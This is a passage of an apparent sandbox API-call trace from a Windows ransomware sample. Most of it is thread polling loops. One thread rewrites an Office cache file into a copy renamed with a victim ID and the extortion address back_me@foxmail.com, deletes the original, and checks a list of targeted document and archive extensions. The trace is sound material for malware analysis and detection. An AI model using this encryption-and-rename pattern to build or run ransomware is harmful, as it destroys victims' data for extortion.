returned 0x194cf [0036.477] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0036.986] GetTickCount () returned 0x196c2 [0036.986] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0037.446] GetTickCount () returned 0x19867 [0037.446] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0037.700] GetTickCount () returned 0x19961 [0037.700] GetTickCount () returned 0x19961 [0037.700] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0038.253] GetTickCount () returned 0x19b16 [0038.254] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0038.466] GetTickCount () returned 0x19be1 [0038.466] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0038.895] GetTickCount () returned 0x19d38 [0038.895] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0039.345] GetTickCount () returned 0x19edd [0039.345] GetTickCount () returned 0x19edd [0039.345] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0039.576] GetTickCount () returned 0x19fb7 [0039.576] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.016] GetTickCount () returned 0x1a17c [0040.016] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.441] GetTickCount () returned 0x1a302 [0040.441] GetTickCount () returned 0x1a302 [0040.441] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.763] GetTickCount () returned 0x1a43a [0040.763] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0040.940] GetTickCount () returned 0x1a4d6 [0040.940] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0041.175] GetTickCount () returned 0x1a5c0 [0041.175] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0041.607] GetTickCount () returned 0x1a775 [0041.607] GetTickCount () returned 0x1a775 [0041.607] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.072] GetTickCount () returned 0x1a91a [0042.072] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.397] GetTickCount () returned 0x1aa61 [0042.397] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.675] GetTickCount () returned 0x1ab7a [0042.676] GetTickCount () returned 0x1ab7a [0042.676] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0042.965] GetTickCount () returned 0x1aca3 [0042.965] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0043.763] GetTickCount () returned 0x1afbe [0043.763] GetTickCount () returned 0x1afbe [0043.763] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0044.213] GetTickCount () returned 0x1b163 [0044.213] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0044.671] GetTickCount () returned 0x1b328 [0044.671] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0044.886] GetTickCount () returned 0x1b3e3 [0044.886] GetTickCount () returned 0x1b3e3 [0044.886] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0045.368] GetTickCount () returned 0x1b5c7 [0045.368] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0045.626] GetTickCount () returned 0x1b6a1 [0045.626] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0046.130] GetTickCount () returned 0x1b894 [0046.130] GetTickCount () returned 0x1b894 [0046.130] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0046.466] GetTickCount () returned 0x1b9eb [0046.466] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0046.758] GetTickCount () returned 0x1bb14 [0046.758] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.033] GetTickCount () returned 0x1bc1d [0047.033] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.438] GetTickCount () returned 0x1bdb3 [0047.438] GetTickCount () returned 0x1bdb3 [0047.438] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.758] GetTickCount () returned 0x1befa [0047.758] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0047.935] GetTickCount () returned 0x1bfa6 [0047.935] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0048.301] GetTickCount () returned 0x1c11c [0048.301] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0048.764] GetTickCount () returned 0x1c2e1 [0048.764] GetTickCount () returned 0x1c2e1 [0048.764] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0049.095] GetTickCount () returned 0x1c438 [0049.095] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0049.449] GetTickCount () returned 0x1c58f [0049.449] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0049.670] GetTickCount () returned 0x1c669 [0049.670] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0050.512] GetTickCount () returned 0x1c9b4 [0050.512] GetTickCount () returned 0x1c9b4 [0050.512] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0050.829] GetTickCount () returned 0x1cafb [0050.829] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0051.055] GetTickCount () returned 0x1cbd6 [0051.056] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0051.286] GetTickCount () returned 0x1ccc0 [0051.286] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0051.549] GetTickCount () returned 0x1cdc9 [0051.549] GetTickCount () returned 0x1cdc9 [0051.549] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0052.385] GetTickCount () returned 0x1d104 [0052.385] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0052.809] GetTickCount () returned 0x1d2b9 [0052.809] GetTickCount () returned 0x1d2b9 [0052.809] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0053.167] GetTickCount () returned 0x1d41f [0053.167] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0053.638] GetTickCount () returned 0x1d5f3 [0053.638] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0054.299] GetTickCount () returned 0x1d883 [0054.299] GetTickCount () returned 0x1d883 [0054.299] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0054.407] GetTickCount () returned 0x1d8f0 [0054.407] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0055.033] GetTickCount () returned 0x1db60 [0055.033] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0055.492] GetTickCount () returned 0x1dd34 [0055.492] GetTickCount () returned 0x1dd34 [0055.492] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0056.035] GetTickCount () returned 0x1df46 [0056.035] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0056.211] GetTickCount () returned 0x1e001 [0056.211] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0056.568] GetTickCount () returned 0x1e168 [0056.568] GetTickCount () returned 0x1e168 [0056.568] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0057.010] GetTickCount () returned 0x1e31d [0057.010] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) returned 0x102 [0057.183] GetTickCount () returned 0x1e3c9 [0057.183] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x64) Thread: id = 9 os_tid = 0x998 [0033.846] GetTickCount () returned 0x18cc4 [0033.846] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x24) returned 0xba84b8 [0033.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba84b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0033.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba84b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0033.851] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba84b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x148 [0033.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0xba84b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c [0033.856] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f78 [0033.856] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7f78, Size=0x20) returned 0xb901f8 [0033.856] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f78 [0033.856] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7f78, Size=0x20) returned 0xb90220 [0033.857] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.857] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.857] Wow64DisableWow64FsRedirection (in: OldValue=0x302ff84 | out: OldValue=0x302ff84*=0x0) returned 1 [0033.857] lstrlenW (lpString="kernel32.dll") returned 12 [0033.857] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb901f8 | out: hHeap=0xb10000) returned 1 [0033.857] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.857] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90220 | out: hHeap=0xb10000) returned 1 [0033.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0xbb43c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x150 [0033.876] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.548] GetTickCount () returned 0x18d9e [0034.548] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.775] GetTickCount () returned 0x18e79 [0034.775] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0034.924] GetTickCount () returned 0x18f05 [0034.924] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0035.321] GetTickCount () returned 0x1906c [0035.321] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0035.495] GetTickCount () returned 0x19117 [0035.495] GetTickCount () returned 0x19117 [0035.495] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0035.858] GetTickCount () returned 0x1925f [0035.858] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.203] GetTickCount () returned 0x193b6 [0036.203] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.477] GetTickCount () returned 0x194cf [0036.477] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0036.986] GetTickCount () returned 0x196c2 [0036.986] GetTickCount () returned 0x196c2 [0036.986] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0037.446] GetTickCount () returned 0x19867 [0037.446] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0037.700] GetTickCount () returned 0x19961 [0037.700] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0038.253] GetTickCount () returned 0x19b16 [0038.253] GetTickCount () returned 0x19b16 [0038.253] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0038.466] GetTickCount () returned 0x19be1 [0038.466] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0038.895] GetTickCount () returned 0x19d38 [0038.895] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0039.345] GetTickCount () returned 0x19edd [0039.345] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0039.576] GetTickCount () returned 0x19fb7 [0039.576] GetTickCount () returned 0x19fb7 [0039.576] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.016] GetTickCount () returned 0x1a17c [0040.016] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.441] GetTickCount () returned 0x1a302 [0040.441] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.762] GetTickCount () returned 0x1a43a [0040.763] GetTickCount () returned 0x1a43a [0040.763] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0040.940] GetTickCount () returned 0x1a4d6 [0040.940] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0041.175] GetTickCount () returned 0x1a5c0 [0041.175] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0041.607] GetTickCount () returned 0x1a775 [0041.607] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.072] GetTickCount () returned 0x1a91a [0042.072] GetTickCount () returned 0x1a91a [0042.072] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.397] GetTickCount () returned 0x1aa61 [0042.397] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.676] GetTickCount () returned 0x1ab7a [0042.676] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0042.965] GetTickCount () returned 0x1aca3 [0042.965] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0043.763] GetTickCount () returned 0x1afbe [0043.763] GetTickCount () returned 0x1afbe [0043.763] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0044.212] GetTickCount () returned 0x1b163 [0044.213] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0044.671] GetTickCount () returned 0x1b328 [0044.671] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0044.886] GetTickCount () returned 0x1b3e3 [0044.886] GetTickCount () returned 0x1b3e3 [0044.886] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0045.368] GetTickCount () returned 0x1b5c7 [0045.368] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0045.626] GetTickCount () returned 0x1b6a1 [0045.626] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0046.130] GetTickCount () returned 0x1b894 [0046.130] GetTickCount () returned 0x1b894 [0046.130] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0046.466] GetTickCount () returned 0x1b9eb [0046.466] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0046.758] GetTickCount () returned 0x1bb14 [0046.758] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.033] GetTickCount () returned 0x1bc1d [0047.033] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.438] GetTickCount () returned 0x1bdb3 [0047.438] GetTickCount () returned 0x1bdb3 [0047.438] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.758] GetTickCount () returned 0x1befa [0047.758] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0047.934] GetTickCount () returned 0x1bfa6 [0047.934] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0048.301] GetTickCount () returned 0x1c11c [0048.301] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0048.764] GetTickCount () returned 0x1c300 [0048.783] GetTickCount () returned 0x1c300 [0048.783] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0049.095] GetTickCount () returned 0x1c438 [0049.095] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0049.449] GetTickCount () returned 0x1c58f [0049.449] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0049.670] GetTickCount () returned 0x1c669 [0049.670] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0050.512] GetTickCount () returned 0x1c9b4 [0050.512] GetTickCount () returned 0x1c9b4 [0050.512] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0050.829] GetTickCount () returned 0x1cafb [0050.829] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0051.056] GetTickCount () returned 0x1cbd6 [0051.056] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0051.286] GetTickCount () returned 0x1ccc0 [0051.286] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0051.549] GetTickCount () returned 0x1cdc9 [0051.549] GetTickCount () returned 0x1cdc9 [0051.549] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0052.386] GetTickCount () returned 0x1d104 [0052.386] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0052.809] GetTickCount () returned 0x1d2b9 [0052.809] GetTickCount () returned 0x1d2b9 [0052.809] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0053.167] GetTickCount () returned 0x1d41f [0053.167] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0053.628] GetTickCount () returned 0x1d5f3 [0053.637] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0054.299] GetTickCount () returned 0x1d883 [0054.299] GetTickCount () returned 0x1d883 [0054.299] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0054.407] GetTickCount () returned 0x1d8f0 [0054.407] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0055.033] GetTickCount () returned 0x1db60 [0055.033] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0055.493] GetTickCount () returned 0x1dd34 [0055.493] GetTickCount () returned 0x1dd34 [0055.493] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0056.035] GetTickCount () returned 0x1df46 [0056.036] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0056.211] GetTickCount () returned 0x1e001 [0056.211] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0056.568] GetTickCount () returned 0x1e168 [0056.568] GetTickCount () returned 0x1e168 [0056.568] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0057.010] GetTickCount () returned 0x1e31d [0057.010] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) returned 0x102 [0057.183] GetTickCount () returned 0x1e3c9 [0057.183] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x64) Thread: id = 10 os_tid = 0x99c [0033.847] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0xbe82f0 [0033.847] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0xbf9d08 [0033.847] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f00 [0033.847] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xb92b00 [0033.847] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7eb8 [0033.847] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x3670020 [0033.848] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ed0 [0033.848] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7ed0, Size=0x20) returned 0xb901f8 [0033.848] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ed0 [0033.848] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7ed0, Size=0x20) returned 0xb90220 [0033.848] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.848] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.848] Wow64DisableWow64FsRedirection (in: OldValue=0x312ff58 | out: OldValue=0x312ff58*=0x0) returned 1 [0033.848] lstrlenW (lpString="kernel32.dll") returned 12 [0033.848] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb901f8 | out: hHeap=0xb10000) returned 1 [0033.848] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.848] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90220 | out: hHeap=0xb10000) returned 1 [0033.848] Sleep (dwMilliseconds=0x64) [0034.478] Sleep (dwMilliseconds=0x64) [0034.597] Sleep (dwMilliseconds=0x64) [0034.782] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.782] lstrlenW (lpString="Setup.xml") returned 9 [0034.782] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.782] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1886) returned 1 [0034.782] CloseHandle (hObject=0x16c) returned 1 [0034.782] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.782] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.782] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.782] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.782] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.782] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0034.783] GetLastError () returned 0x0 [0034.783] ReadFile (in: hFile=0x16c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x75e, lpOverlapped=0x0) returned 1 [0034.796] WriteFile (in: hFile=0x170, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x760, lpOverlapped=0x0) returned 1 [0034.797] ReadFile (in: hFile=0x16c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.797] WriteFile (in: hFile=0x170, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.797] SetEndOfFile (hFile=0x170) returned 1 [0034.797] CloseHandle (hObject=0x170) returned 1 [0034.798] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.798] SetEndOfFile (hFile=0x16c) returned 1 [0034.798] CloseHandle (hObject=0x16c) returned 1 [0034.798] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.799] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.799] lstrlenW (lpString=".doc") returned 4 [0034.799] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.799] lstrlenW (lpString=".docx") returned 5 [0034.799] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.799] lstrlenW (lpString=".pdf") returned 4 [0034.799] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.799] lstrlenW (lpString=".xls") returned 4 [0034.799] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.799] lstrlenW (lpString=".xlsx") returned 5 [0034.799] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.799] lstrlenW (lpString=".ppt") returned 4 [0034.799] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.799] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.799] lstrlenW (lpString=".zip") returned 4 [0034.799] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.799] lstrlenW (lpString=".rar") returned 4 [0034.799] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.799] lstrlenW (lpString=".bz2") returned 4 [0034.799] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.799] lstrlenW (lpString=".7z") returned 3 [0034.799] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.800] lstrlenW (lpString=".dbf") returned 4 [0034.800] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.800] lstrlenW (lpString=".1cd") returned 4 [0034.800] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.800] lstrlenW (lpString=".jpg") returned 4 [0034.800] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.800] lstrlenW (lpString=".doc") returned 4 [0034.800] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString=".docx") returned 5 [0034.800] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.800] lstrlenW (lpString=".pdf") returned 4 [0034.800] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString=".xls") returned 